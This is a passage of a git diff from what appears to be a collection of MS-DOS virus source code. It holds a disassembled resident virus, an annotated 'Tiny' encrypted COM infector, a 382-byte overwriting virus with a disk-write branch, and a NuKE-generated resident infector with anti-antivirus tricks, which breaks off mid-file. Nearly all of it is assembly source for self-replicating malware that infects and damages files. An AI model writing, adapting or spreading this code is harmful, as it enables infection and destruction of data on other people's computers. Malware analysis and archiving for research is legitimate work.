ds,cx + mov cx,7D0h + xor si,si ; Zero register + mov di,offset ds:[0CF5h] ; (6FB8:0CF5=0BEh) + rep movsw ; Rep when cx >0 Mov [si] to es:[di] + xor ax,ax ; Zero register + mov ds,ax + mov ax,0B92h + xchg ax,ds:data_1e ; (0000:0024=45h) + mov word ptr cs:[973h],ax ; (6FB8:0973=984h) + mov ax,cs + xchg ax,ds:data_2e ; (0000:0026=3D1h) + mov word ptr cs:[975h],ax ; (6FB8:0975=0AAACh) +loc_63: ; xref 6FB8:0A7E + mov cx,50h + mov ax,0F00h + mov di,offset data_54 ; (6FB8:0105=9) + rep stosw ; Rep when cx >0 Store ax to es:[di] + and byte ptr cs:[972h],7 ; (6FB8:0972=0BFh) +loc_64: ; xref 6FB8:0A82, 0A9D + pop di + pop si + pop es + pop ds + pop cx + jmp loc_76 ; (0BCF) +loc_65: ; xref 6FB8:0AFE + jmp short loc_60 ; (0A74) + push ax + mov byte ptr cs:[979h],0 ; (6FB8:0979=75h) + mov al,byte ptr cs:[972h] ; (6FB8:0972=0BFh) + test al,60h ; '`' + jnz loc_65 ; Jump if not zero + test al,80h + jz loc_68 ; Jump if zero + cmp word ptr cs:[97Eh],0 ; (6FB8:097E=0EDE8h) + je loc_66 ; Jump if equal + inc word ptr cs:[97Eh] ; (6FB8:097E=0EDE8h) + cmp word ptr cs:[97Eh],444h ; (6FB8:097E=0EDE8h) + jl loc_66 ; Jump if < + call sub_19 ; (0C25) + jmp loc_76 ; (0BCF) +loc_66: ; xref 6FB8:0B0A, 0B18 + test al,18h + jz loc_67 ; Jump if zero + dec word ptr cs:[977h] ; (6FB8:0977=0C00Ah) + jnz loc_67 ; Jump if not zero + and byte ptr cs:[972h],0E7h ; (6FB8:0972=0BFh) + or byte ptr cs:[972h],40h ; (6FB8:0972=0BFh) '@' + test al,8 + jz loc_67 ; Jump if zero + or byte ptr cs:[972h],20h ; (6FB8:0972=0BFh) ' ' +loc_67: ; xref 6FB8:0B22, 0B29, 0B39, 0B4C + jmp loc_76 ; (0BCF) +loc_68: ; xref 6FB8:0B02 + xor byte ptr cs:[972h],1 ; (6FB8:0972=0BFh) + test al,1 + jz loc_67 ; Jump if zero + push bx + push si + push ds + mov ds,word ptr cs:[97Ch] ; (6FB8:097C=5E5Fh) + xor si,si ; Zero register + mov byte ptr cs:[96Eh],0 ; (6FB8:096E=8Bh) +loc_69: ; xref 6FB8:0BB5 + mov bx,cs:data_54[si] ; (6FB8:0105=0CD09h) + or bx,bx ; Zero ? + jz loc_70 ; Jump if zero + cmp byte ptr [bx+si],20h ; ' ' + jne loc_70 ; Jump if not equal + cmp byte ptr ds:data_31e[bx+si],20h ; (5E5F:FF60=0FFh) ' ' + je loc_70 ; Jump if equal + mov ax,720h + xchg ax,ds:data_31e[bx+si] ; (5E5F:FF60=0FFFFh) + mov [bx+si],ax + add bx,0A0h +loc_70: ; xref 6FB8:0B65, 0B6A, 0B71 + cmp bx,data_30e ; (5E5F:0FA0=0FFh) + je loc_71 ; Jump if equal + cmp byte ptr [bx+si],20h ; ' ' + jne loc_71 ; Jump if not equal + jnz loc_74 ; Jump if not zero +loc_71: ; xref 6FB8:0B84, 0B89 + mov bx,data_29e ; (5E5F:0F00=0FFh) +loc_72: ; xref 6FB8:0BA2 + cmp byte ptr [bx+si],20h ; ' ' + jne loc_73 ; Jump if not equal + cmp byte ptr ds:data_31e[bx+si],20h ; (5E5F:FF60=0FFh) ' ' + jne loc_74 ; Jump if not equal +loc_73: ; xref 6FB8:0B93 + sub bx,0A0h + or bx,bx ; Zero ? + jnz loc_72 ; Jump if not zero +loc_74: ; xref 6FB8:0B8B, 0B9A + mov cs:data_54[si],bx ; (6FB8:0105=0CD09h) + or word ptr cs:[96Eh],bx ; (6FB8:096E=0F28Bh) + add si,2 + cmp si,0A0h + jne loc_69 ; Jump if not equal + cmp byte ptr cs:[96Eh],0 ; (6FB8:096E=8Bh) + jne loc_75 ; Jump if not equal + or byte ptr cs:[972h],80h ; (6FB8:0972=0BFh) + mov word ptr cs:[97Eh],1 ; (6FB8:097E=0EDE8h) +loc_75: ; xref 6FB8:0BBD + pop ds + pop si + pop bx +loc_76: ; xref 6FB8:0AEC, 0B1D, 0B41 + pop ax +;* jmp far ptr loc_90 ;*(FC00:3F4D) + db 0EAh, 4Dh, 3Fh, 00h,0FCh +loc_77: ; xref 6FB8:0C32 + mov al,20h ; ' ' + out 20h,al ; port 20h, 8259-1 int command + ; al = 20h, end of interrupt + pop ax + iret ; Interrupt return + db 50h,0E4h, 60h, 2Eh,0A2h, 7Ah + db 09h,0E4h, 61h, 8Ah,0E0h, 0Ch + db 80h,0E6h, 61h, 8Ah,0C4h,0E6h + db 61h, 2Eh, 80h, 3Eh, 79h, 09h + db 00h, 2Eh,0C6h, 06h, 79h, 09h + db 01h, 75h,0D9h, 2Eh,0A0h, 7Ah + db 09h, 3Ch,0F0h, 74h,0D1h, 24h + db 7Fh, 2Eh, 3Ah, 06h, 7Bh, 09h + db 2Eh,0A2h, 7Bh, 09h, 74h,0C4h + db 2Eh, 83h, 3Eh, 7Eh, 09h, 00h + db 74h, 07h, 2Eh,0C7h, 06h, 7Eh + db 09h, 01h, 00h,0E8h, 02h, 00h + db 0EBh,0B0h + +; +; SUBROUTINE +; +; Called from: 6FB8:0B1A +; + +sub_19 proc near + mov word ptr cs:[977h],28h ; (6FB8:0977=0C00Ah) + test byte ptr cs:[972h],80h ; (6FB8:0972=0BFh) + jz loc_77 ; Jump if zero + mov byte ptr cs:[970h],1 ; (6FB8:0970=0Eh) + push bx + push si + push ds + mov ds,word ptr cs:[97Ch] ; (6FB8:097C=5E5Fh) + test byte ptr cs:[972h],10h ; (6FB8:0972=0BFh) + jnz loc_81 ; Jump if not zero + or byte ptr cs:[972h],10h ; (6FB8:0972=0BFh) + xor si,si ; Zero register +loc_78: ; xref 6FB8:0C77 + mov bx,data_29e ; (5E5F:0F00=0FFh) +loc_79: ; xref 6FB8:0C5E + cmp byte ptr [bx+si],20h ; ' ' + je loc_80 ; Jump if equal + sub bx,0A0h + jnc loc_79 ; Jump if carry=0 + mov bx,0F00h +loc_80: ; xref 6FB8:0C58 + add bx,data_28e ; (5E5F:00A0=0FFh) + mov cs:data_54[si],bx ; (6FB8:0105=0CD09h) + mov word ptr cs:[980h][si],bx ; (6FB8:0980=0E8FBh) + inc si + inc si + cmp si,data_37e ; (6FB8:00A0=0) + jne loc_78 ; Jump if not equal +loc_81: ; xref 6FB8:0C48 + xor si,si ; Zero register +loc_82: ; xref 6FB8:0CE4 + cmp cs:data_54[si],0FA0h ; (6FB8:0105=0CD09h) + je loc_88 ; Jump if equal + mov bx,word ptr cs:[980h][si] ; (6FB8:0980=0E8FBh) + mov ax,[bx+si] + cmp ax,word ptr cs:[0CF5h][bx+si] ; (6FB8:0CF5=0F5BEh) + jne loc_84 ; Jump if not equal + push bx +loc_83: ; xref 6FB8:0CA0, 0CA4 + or bx,bx ; Zero ? + jz loc_86 ; Jump if zero + sub bx,0A0h + cmp ax,word ptr cs:[0CF5h][bx+si] ; (6FB8:0CF5=0F5BEh) + jne loc_83 ; Jump if not equal + cmp ax,[bx+si] + je loc_83 ; Jump if equal + pop bx +loc_84: ; xref 6FB8:0C90 + or bx,bx ; Zero ? + jnz loc_85 ; Jump if not zero + mov word ptr [si],720h + jmp short loc_87 ; (0CCB) +loc_85: ; xref 6FB8:0CA9 + mov ax,[bx+si] + mov ds:data_31e[bx+si],ax ; (5E5F:FF60=0FFFFh) + mov word ptr [bx+si],720h + sub word ptr cs:[980h][si],0A0h ; (6FB8:0980=0E8FBh) + mov byte ptr cs:[970h],0 ; (6FB8:0970=0Eh) + jmp short loc_88 ; (0CDE) +loc_86: ; xref 6FB8:0C95 + pop bx +loc_87: ; xref 6FB8:0CAF + mov bx,cs:data_54[si] ; (6FB8:0105=0CD09h) + add bx,0A0h + mov cs:data_54[si],bx ; (6FB8:0105=0CD09h) + mov word ptr cs:[980h][si],bx ; (6FB8:0980=0E8FBh) +loc_88: ; xref 6FB8:0C82, 0CC8 + inc si + inc si + cmp si,0A0h + jne loc_82 ; Jump if not equal + cmp byte ptr cs:[970h],0 ; (6FB8:0970=0Eh) + je loc_89 ; Jump if equal + push es + push di + push cx + push ds + pop es + push cs + pop ds + mov si,offset ds:[0CF5h] ; (6FB8:0CF5=0BEh) + xor di,di ; Zero register + mov cx,7D0h + rep movsw ; Rep when cx >0 Mov [si] to es:[di] + mov word ptr cs:[977h],0FFDCh ; (6FB8:0977=0C00Ah) + and byte ptr cs:[972h],4 ; (6FB8:0972=0BFh) + or byte ptr cs:[972h],88h ; (6FB8:0972=0BFh) + mov word ptr cs:[97Eh],0 ; (6FB8:097E=0EDE8h) + xor ax,ax ; Zero register + mov ds,ax + mov ax,word ptr cs:[973h] ; (6FB8:0973=984h) + mov ds:data_1e,ax ; (0000:0024=45h) + mov ax,word ptr cs:[975h] ; (6FB8:0975=0AAACh) + mov ds:data_2e,ax ; (0000:0026=3D1h) + pop cx + pop di + pop es +loc_89: ; xref 6FB8:0CEC + pop ds + pop si + pop bx + retn +sub_19 endp + + +; +; SUBROUTINE +; +; Called from: 6FB8:04D3, 04EC +; + +sub_20 proc near + cld ; Clear direction + pop ax + sub ax,si + add ax,di + push es + push ax + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + retf ; Return far +sub_20 endp + + db 90h, 50h,0E8h,0E2h, 03h, 8Bh + +seg_a ends + + + + end start + + CROSS REFERENCE - KEY ENTRY POINTS + + seg:off type label + ---- ---- ---- --------------- + 6FB8:0100 far start + + Interrupt Usage Synopsis + + Interrupt 21h : set default drive dl (0=a:) + Interrupt 21h : get default drive al (0=a:) + Interrupt 21h : set DTA to ds:dx + Interrupt 21h : get date, cx=year, dx=mon/day + Interrupt 21h : set current dir, path @ ds:dx + Interrupt 21h : open file, al=mode,name@ds:dx + Interrupt 21h : close file, bx=file handle + Interrupt 21h : read file, cx=bytes, to ds:dx + Interrupt 21h : write file cx=bytes, to ds:dx + Interrupt 21h : move file ptr, cx,dx=offset + Interrupt 21h : get/set file attrb, nam@ds:dx + Interrupt 21h : get present dir,drive dl,1=a: + Interrupt 21h : get/set file date & time + + I/O Port Usage Synopsis + + Port 20h : 8259-1 int command + diff --git a/MSDOS/Virus.MSDOS.Unknown.334.asm b/MSDOS/Virus.MSDOS.Unknown.334.asm new file mode 100644 index 00000000..62648043 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.334.asm @@ -0,0 +1,252 @@ + +muttiny segment byte public + assume cs:muttiny, ds:muttiny + + org 100h + +start: db 0e9h, 5, 0 ; jmp startvir +restorehere: int 20h +idword: dw 990h +; The next line is incredibly pointless. It is a holdover from one +; of the original TINYs, where the id was 7, 8, 9. The author can +; easily save one byte merely by deleting this line. + db 09h +startvir: + call oldtrick ; Standard location-finder +oldtrick: pop si +; The following statement is a bug -- well, not really a bug, just +; extraneous code. The value pushed on the stack in the following +; line is NEVER popped off. This is messy programming, as one byte +; could be saved by removing the statement. + push si + sub si,offset oldtrick + call encrypt ; Decrypt virus + call savepsp ; and save the PSP +; NOTE: The entire savepsp/restorepsp procedures are unnecessary. +; See the procedures at the end for further details. + jmp short findencryptval ; Go to the rest of the virus +; The next line is another example of messy programming -- it is a +; NOP inserted by MASM during assembly. Running this file through +; TASM with the /m2 switch should eliminate such "fix-ups." + nop +; The next line leaves me guessing as to the author's true intent. + db 0 + +encryptval dw 0h + +encrypt: + push bx ; Save handle +; The following two lines of code could be condensed into one: +; lea bx, [si+offset startencrypt] +; Once again, poor programming style, though there's nothing wrong +; with the code. + mov bx,offset startencrypt + add bx,si +; Continueencrypt is implemented as a jmp-type loop. Although it's +; fine to code it this way, it's probably easier to code using the +; loop statement. Upon close inspection, one finds the loop to be +; flawed. Note the single inc bx statement. This essentially makes +; the encryption value a a byte instead of a word, which decreases +; the number of mutations from 65,535 to 255. Once again, this is +; just poor programming, very easily rectified with another inc bx +; statement. Another optimization could be made. Use a +; mov dx, [si+encryptval] +; to load up the encryption value before the loop, and replace the +; three lines following continueencrypt with a simple: +; xor word ptr [bx], dx +continueencrypt: + mov ax,[bx] + xor ax,word ptr [si+encryptval] + mov [bx],ax + inc bx +; The next two lines should be executed BEFORE continueencrypt. As +; it stands right now, they are recalculated every iteration which +; slows down execution somewhat. Furthermore, the value calculated +; is much too large and this increases execution time. Yet another +; improvement would be the merging of the mov/add pair to the much +; cleaner lea cx, [si+offset endvirus]. + mov cx,offset veryend ; Calculate end of + add cx,si ; encryption: Note + cmp bx,cx ; the value is 246 + jle continueencrypt ; bytes too large. + pop bx + ret +writerest: ; Tack on the virus to the + call encrypt ; end of the file. + mov ah,40h + mov cx,offset endvirus - offset idword + lea dx,[si+offset idword] ; Write starting from the id + int 21h ; word + call encrypt + ret + +startencrypt: +; This is where the encrypted area begins. This could be moved to +; where the ret is in procedure writerest, but it is not necessary +; since it won't affect the "scannability" of the virus. + +findencryptval: + mov ah,2Ch ; Get random # + int 21h ; CX=hr/min dx=sec +; The following chunk of code puzzles me. I admit it, I am totally +; lost as to its purpose. + cmp word ptr [si+offset encryptval],0 + je step_two + cmp word ptr [si+offset encryptval+1],0 + je step_two + cmp dh,0Fh + jle foundencryptionvalue +step_two: ; Check to see if any + cmp dl,0 ; part of the encryption + je findencryptval ; value is 0 and if so, + cmp dh,0 ; find another value. + je findencryptval + mov [si+offset encryptval],dx +foundencryptionvalue: + mov bp,[si+offset oldjmp] ; Set up bp for + add bp,103h ; jmp later + lea dx,[si+filemask] ; '*.COM',0 + xor cx,cx ; Attributes + mov ah,4Eh ; Find first +tryanother: + int 21h + jc quit_virus ; If none found, exit + + mov ax,3D02h ; Open read/write + mov dx,9Eh ; In default DTA + int 21h + + mov cx,3 + mov bx,ax ; Swap file handle register + lea dx,[si+offset buffer] + mov di,dx + call read ; Read 3 bytes + cmp byte ptr [di],0E9h ; Is it a jmp? + je infect +findnext: + mov ah,4Fh ; If not, find next + jmp short tryanother +infect: + mov ax,4200h ; Move file pointer + mov dx,[di+1] ; to jmp location + mov [si+offset oldjmp],dx ; and save old jmp + xor cx,cx ; location + call int21h + jmp short skipcheckinf +; Once again, we meet an infamous MASM-NOP. + nop +; I don't understand why checkinf is implemented as a procedure as +; it is executed but once. It is a waste of code space to do such +; a thing. The ret and call are both extra, wasting four bytes. An +; additional three bytes were wasted on the JMP skipping checkinf. +; In a program called "Tiny," a wasted seven bytes is rather large +; and should not exist. I have written a virus of half the length +; of this virus which is a generic COM infector. There is just too +; too much waste in this program. +checkinf: + cmp word ptr [di],990h ; Is it already + je findnext ; infected? +; The je statement above presents another problem. It leaves stuff +; on the stack from the call. This is, once again, not a critical +; error but nevertheless it is extremely sloppy behavior. + xor dx,dx + xor cx,cx + mov ax,4202h + call int21h ; Goto end of file + ret +skipcheckinf: + mov cx,2 + mov dx,di + call read ; read 2 bytes + call checkinf +; The next check is extraneous. No COM file is larger than 65,535 +; bytes before infection simply because it is "illegal." Yet ano- +; ther waste of code. Even if one were to use this useless check, +; it should be implemented, to save space, as or dx, dx. + cmp dx,0 ; Check if too big + jne findnext + + cmp ah,0FEh ; Check again if too big + jae findnext + mov [si+storejmp],ax ; Save new jmp + call writerest ; location + mov ax,4200h ; Go to offset + mov dx,1 ; 1 in the file + xor cx,cx + call int21h + + mov ah,40h ; and write the new + mov cx,2 ; jmp location + lea dx,[si+storejmp] + call int21h +; I think it is quite obvious that the next line is pointless. It +; is a truly moronic waste of two bytes. + jc closefile +closefile: + mov ah,3Eh ; Close the file + call int21h +quit_virus: + call restorepsp + jmp bp + +read: + mov ah,3Fh ; Read file +; I do not understand why all the int 21h calls are done with this +; procedure. It is a waste of space. A normal int 21h call is two +; bytes long while it's three bytes just to call this procedure! +int21h: + int 21h + ret + + db 'Made in England' + +; Note: The comments for savepsp also apply to restorepsp. + +; This code could have easily been changed to a set active DTA INT +; 21h call (AH = 1Ah). It would have saved many, many bytes. + +savepsp: + mov di,0 +; The following is a bug. It should be +; mov cx, 50h +; since the author decided to use words instead of bytes. + mov cx,100h + push si +; The loop below is dumb. A simple rep movsw statement would have +; sufficed. Instead, countless bytes are wasted on the loop. +storebytes: + mov ax,[di] + mov word ptr [si+pspstore],ax + add si,2 + add di,2 + loop storebytes + pop si + ret + +restorepsp: + mov di,0 + mov cx,100h ; Restore 200h bytes + push si +restorebytes: + mov ax,word ptr [si+pspstore] + mov [di],ax + add si,2 + add di,2 + loop restorebytes + pop si + ret + +oldjmp dw 0 +filemask db '*.COM',0 +idontknow1 db 66h ; Waste of one byte +buffer db 00h, 00h, 01h ; Waste of three bytes +storejmp dw 0 ; Waste of two bytes +; endvirus should be before idontknow1, thereby saving six bytes. +endvirus: +idontknow2 db ?, ? +pspstore db 200 dup (?) ; Should actually be +idontknow3 db 2ch dup (?) ; 100h bytes long. +veryend: ; End of encryption +muttiny ends + end start + diff --git a/MSDOS/Virus.MSDOS.Unknown.382.asm b/MSDOS/Virus.MSDOS.Unknown.382.asm new file mode 100644 index 00000000..a1ebb8e0 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.382.asm @@ -0,0 +1,243 @@ +>>> Article From Evolution #2 - YAM '92 + +Article Title: 382 Virus +Author: Admiral Bailey + + +;=--- +; +; 382 Virus (Family-Q as McAfee 91 calls it) +; +; Disassembled By Admiral Bailey [YAM '92] +; June 25, 1992 +; +; The writer of this is unknown to me... maybe you should put some of +; your info in it. +; +; Notes:This virus I found on a board and got right to it. It wasnt +; too hard to disassemble since there was no encryption. Its an +; .com over writing virus. Yes there is ????????exe inside the +; file but I don't know what the hell that is. If you run it it +; only overwrits the com files. It probably get exe files if no +; com files are found. But anyways there seems to be a bug in +; the original virus. Put it in a directory and run it it will +; display crap and crash the computer. With out doing any +; damage. If you want any more info check it out for yourself. +; All i did this time was comment it.. cuz i found this to be a +; boring run of the mill virus. Anyways here it is. +; +;=--------- + +PAGE 59,132 ; I gotta check out + ; what this means... + +data_1e equ 9Eh +data_15e equ 0E000h +data_17e equ 0E17Eh + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + org 100h + +382 proc far + +start: + jmp short $+2 ; just there to confuse + mov cs:data_4,0 ; actually jumps to here + mov ah,19h ; get default drive + int 21h + mov cs:data_11,al ; save default drive + mov ah,47h ; get present dir of + mov dl,0 ; current drive + lea si,data_13 ; holds directory name + int 21h + clc +loc_1: + jnc loc_2 ; if no error then jump + mov ah,17h ; rename file + lea dx,data_7 ; Load effective addr + int 21h + cmp al,0FFh ; is there an error? + jne loc_2 ; no then jump + mov ah,2Ch ; get current time + int 21h + + mov al,cs:data_11 ; drive + mov bx,dx ; buffer + mov cx,2 ; # of sectors + mov dh,0 ; parm block + int 26h ; Absolute disk write + jmp loc_9 + +loc_2: + mov ah,3Bh ; set the current + lea dx,data_10 ; directory + int 21h + + jmp short loc_6 +loc_3: + mov ah,17h ; rename file + lea dx,data_7 + int 21h + + mov ah,3Bh ; set current directory + lea dx,data_10 + int 21h + + mov ah,4Eh ; find first file + mov cx,11h + lea dx,data_6 ; file type + int 21h + + jc loc_1 ; Jump if carry Set + mov bx,cs:data_4 ; put value in bx + inc bx ; check to see if it is + dec bx ; zero + jz loc_5 +loc_4: + mov ah,4Fh ; find next file + int 21h + + jc loc_1 ; none found then jump + dec bx + jnz loc_4 ; Jump if not zero +loc_5: + mov ah,2Fh ; get dta + int 21h + + add bx,1Ch + mov word ptr es:[bx],5C20h + inc bx + push ds ; save ds + mov ax,es ; putting es into ds + mov ds,ax + mov dx,bx + mov ah,3Bh ; get current dir + int 21h + + pop ds ; get old ds + mov bx,cs:data_4 + inc bx + mov cs:data_4,bx +loc_6: + mov ah,4Eh ; find first file + mov cx,1 + lea dx,data_5 ; type to find + int 21h + + jc loc_3 ; none found then jump + jmp short loc_8 +loc_7: + mov ah,4Fh ; find next file + int 21h + + jc loc_3 ; none found then jump +loc_8: + mov ah,3Dh ; open file + mov al,0 + mov dx,data_1e + int 21h + + mov bx,ax ; file name in bx + mov ah,3Fh ; read file + mov cx,17Eh ; number of bytes + nop + mov dx,data_15e ; buffer to hold the + nop ; bytes + int 21h + + mov ah,3Eh ; close the file + int 21h + + mov bx,cs:data_15e + cmp bx,0EBh + je loc_7 + mov ah,43h ; get attrib + mov al,0 + mov dx,data_1e ; filename + int 21h + + mov ah,43h ; set attrib + mov al,1 + and cx,0FEh + int 21h + + mov ah,3Dh ; open up the file + mov al,2 + mov dx,data_1e ; filename + int 21h + + mov bx,ax ; filename + mov ah,57h ; get files date and + mov al,0 ; time + int 21h + + push cx ; save time + push dx + mov dx,word ptr cs:[23Ch] + mov cs:data_17e,dx + mov dx,word ptr cs:data_15e+1 + lea cx,cs:[13Bh] + sub dx,cx + mov word ptr cs:[23Ch],dx + mov ah,40h ; write to file + mov cx,17Eh ; size of virus [382] + nop + lea dx,ds:[100h] ; Load effective addr + int 21h + + mov ah,57h ; set files time+date + mov al,1 + pop dx ; get old date+time + pop cx + int 21h + + mov ah,3Eh ; close up the file + int 21h + + mov dx,cs:data_17e + mov word ptr cs:[23Ch],dx +loc_9: + call sub_1 + jmp $-3618h + db 0B4h, 4Ch,0CDh, 21h ; bytes to quit + ; mov ax,4c00h + ; int 21 + +382 endp + +sub_1 proc near + mov ah,3Bh ; set current dir + lea dx,data_12 ; holds current + int 21h ; directory + retn +sub_1 endp + +data_4 dw 0 +data_5 db 2Ah + db 2Eh, 63h, 6Fh, 6Dh, 00h +data_6 db 2Ah + db 0 +data_7 db 0FFh + db 00h, 00h, 00h, 00h, 00h, 3Fh + db 00h + db 3Fh + db 7 dup (3Fh) + db 65h, 78h, 65h, 00h, 00h, 00h + db 00h, 00h + db 3Fh + db 7 dup (3Fh) + db 63h, 6Fh, 6Dh, 00h +data_10 db 5Ch + db 0 +data_11 db 4 +data_12 db 5Ch +data_13 db 0 + +seg_a ends + + + + end start + + diff --git a/MSDOS/Virus.MSDOS.Unknown.386sx16.asm b/MSDOS/Virus.MSDOS.Unknown.386sx16.asm new file mode 100644 index 00000000..0dc1e608 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.386sx16.asm @@ -0,0 +1,454 @@ +;Ŀ +; THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. [NuKE] PoWeR +; CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN [NuKE] WaReZ +; auToR: aLL [NuKE] MeMeBeRS [NuKE] PoWeR +; [NuKE] THe ReaL PoWeR! [NuKE] WaReZ +; NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 [NuKE] PoWeR +; + +.286 +code segment +assume cs:code,ds:code +org 100h + +start: CALL NEXT + +NEXT: + mov di,sp ;take the stack pointer location + mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus + sub bp,offset next ;subtract the large code off this code + ; +;******************************************************************* +; #1 DECRYPT ROUTINE +;******************************************************************* + +cmp byte ptr cs:[crypt],0b9h ;is the first runnig? +je crypt2 ;yes! not decrypt +;---------------------------------------------------------- +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt]+ bp ;di = first byte to decrypt +mov dx,1 ;dx = value for decrypt +;---------------------------------------------------------- +deci: ;deci = fuck label! +;---------------------------------------------------------- + +inc word ptr [di] +not byte ptr [di] +sub word ptr [di],0bb4h +xor byte ptr [di],049h +xor word ptr [di],0e373h +sub word ptr [di],0ec3h +add word ptr [di],0e273h +add byte ptr [di],01h +inc word ptr [di] +xor byte ptr [di],02ah +xor word ptr [di],07ab0h +not word ptr [di] +xor byte ptr [di],071h +not byte ptr [di] +xor word ptr [di],0294ah +xor byte ptr [di],0ebh +inc di +inc di +;---------------------------------------------------------- +jmp bye ;######## BYE BYE F-PROT ! ########## +mov ah,4ch +int 21h +bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!### +;----------------------------------------------------------- +mov ah,0bh ;######### BYE BYE TBAV ! ########## +int 21h ;### (CANGE INT AT YOU PLEASURE) ### +;---------------------------------------------------------- +loop deci ;repeat please! + ; +;***************************************************************** +; #2 DECRYPT ROUTINE +;***************************************************************** + ; +crypt: ;fuck label! + ; +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt2] + bp ;di = first byte to decrypt +;--------------------------------------------------------------- +deci2: ; +xor byte ptr cs:[di],1 ;decrytion rutine +inc di ;very simple... +loop deci2 ; +;--------------------------------------------------------------- +crypt2: ;fuck label! + ; +MOV AX,0CACAH ;call to my resident interrup mask +INT 21H ;for chek "I'm is residet?" +CMP Bh,0CAH ;is equal to CACA? +JE PUM2 ;yes! jump to runnig program +call action +;***************************************************************** +; NRLG FUNCTIONS (SELECTABLE) +;***************************************************************** + +call ANTI_V +;**************************************************************** +; PROCESS TO REMAIN RESIDENT +;**************************************************************** + +mov ax,3521h +int 21h ;store the int 21 vectors +mov word ptr [bp+int21],bx ;in cs:int21 +mov word ptr [bp+int21+2],es ; +;--------------------------------------------------------------- +push cs ; +pop ax ;ax = my actual segment +dec ax ;dec my segment for look my MCB +mov es,ax ; +mov bx,es:[3] ;read the #3 byte of my MCB =total used memory +;--------------------------------------------------------------- +push cs ; +pop es ; +sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus +sub bx,17 + offset fin ;and 100H for the PSP total +mov ah,4ah ;used memory +int 21h ;put the new value to MCB +;--------------------------------------------------------------- +mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin +mov ah,48h ; +int 21h ;request the memory to fuck DOS! +;--------------------------------------------------------------- +dec ax ;ax=new segment +mov es,ax ;ax-1= new segment MCB +mov byte ptr es:[1],8 ;put '8' in the segment +;-------------------------------------------------------------- +inc ax ; +mov es,ax ;es = new segment +lea si,[bp + offset start] ;si = start of virus +mov di,100h ;di = 100H (psp position) +mov cx,offset fin - start ;cx = lag of virus +push cs ; +pop ds ;ds = cs +cld ;mov the code +rep movsb ;ds:si >> es:di +;-------------------------------------------------------------- +mov dx,offset virus ;dx = new int21 handler +mov ax,2521h ; +push es ; +pop ds ; +int 21h ;set the vectors +;------------------------------------------------------------- +pum2: ; + ; +mov ah,byte ptr [cs:bp + real] ;restore the 3 +mov byte ptr cs:[100h],ah ;first bytes +mov ax,word ptr [cs:bp + real + 1] ; +mov word ptr cs:[101h],ax ; +;------------------------------------------------------------- +mov ax,100h ; +jmp ax ;jmp to execute + ; +;***************************************************************** +;* HANDLER FOR THE INT 21H +;***************************************************************** + ; +VIRUS: ; + ; +cmp ah,4bh ;is a 4b function? +je REPRODUCCION ;yes! jump to reproduce ! +cmp ah,11h +je dir +cmp ah,12h +je dir +dirsal: +cmp AX,0CACAH ;is ... a caca function? (resident chek) +jne a3 ;no! jump to a3 +mov bh,0cah ;yes! put ca in bh +a3: ; +JMP dword ptr CS:[INT21] ;jmp to original int 21h +ret ; +make db '[NuKE] N.R.L.G. AZRAEL' +dir: +jmp dir_s +;------------------------------------------------------------- +REPRODUCCION: ; + ; +pushf ;put the register +pusha ;in the stack +push si ; +push di ; +push bp ; +push es ; +push ds ; +;------------------------------------------------------------- +push cs ; +pop ds ; +mov ax,3524H ;get the dos error control +int 21h ;interupt +mov word ptr error,es ;and put in cs:error +mov word ptr error+2,bx ; +mov ax,2524H ;change the dos error control +mov dx,offset all ;for my "trap mask" +int 21h ; +;------------------------------------------------------------- +pop ds ; +pop es ;restore the registers +pop bp ; +pop di ; +pop si ; +popa ; +popf ; +;------------------------------------------------------------- +pushf ;put the registers +pusha ; +push si ;HEY! AZRAEL IS CRAZY? +push di ;PUSH, POP, PUSH, POP +push bp ;PLEEEEEAAAAAASEEEEEEEEE +push es ;PURIFY THIS SHIT! +push ds ; +;------------------------------------------------------------- +mov ax,4300h ; +int 21h ;get the file +mov word ptr cs:[attrib],cx ;atributes +;------------------------------------------------------------- +mov ax,4301h ;le saco los atributos al +xor cx,cx ;file +int 21h ; +;------------------------------------------------------------- +mov ax,3d02h ;open the file +int 21h ;for read/write +mov bx,ax ;bx=handle +;------------------------------------------------------------- +mov ax,5700h ; +int 21h ;get the file date +mov word ptr cs:[hora],cx ;put the hour +mov word ptr cs:[dia],dx ;put the day +and cx,word ptr cs:[fecha] ;calculate the seconds +cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX) +jne seguir ;yes! the file is infected! +jmp cerrar ; +;------------------------------------------------------------ +seguir: ; +mov ax,4202h ;move the pointer to end +call movedor ;of the file +;------------------------------------------------------------ +push cs ; +pop ds ; +sub ax,3 ;calculate the +mov word ptr [cs:largo],ax ;jmp long +;------------------------------------------------------------- +mov ax,04200h ;move the pointer to +call movedor ;start of file +;---------------------------------------------------------- +push cs ; +pop ds ;read the 3 first bytes +mov ah,3fh ; +mov cx,3 ; +lea dx,[cs:real] ;put the bytes in cs:[real] +int 21h ; +;---------------------------------------------------------- +cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ? +jne er1 ;yes! is a EXE... fuckkk! +;---------------------------------------------------------- +jmp cerrar +er1: +;---------------------------------------------------------- +mov ax,4200h ;move the pointer +call movedor ;to start fo file +;---------------------------------------------------------- +push cs ; +pop ds ; +mov ah,40h ; +mov cx,1 ;write the JMP +lea dx,[cs:jump] ;instruccion in the +int 21h ;fist byte of the file +;---------------------------------------------------------- +mov ah,40h ;write the value of jmp +mov cx,2 ;in the file +lea dx,[cs:largo] ; +int 21h ; +;---------------------------------------------------------- +mov ax,04202h ;move the pointer to +call movedor ;end of file +;---------------------------------------------------------- +push cs ; +pop ds ;move the code +push cs ;of my virus +pop es ;to cs:end+50 +cld ;for encrypt +mov si,100h ; +mov di,offset fin + 50 ; +mov cx,offset fin - 100h ; +rep movsb ; +;---------------------------------------------------------- +mov cx,offset fin +mov di,offset fin + 50 + 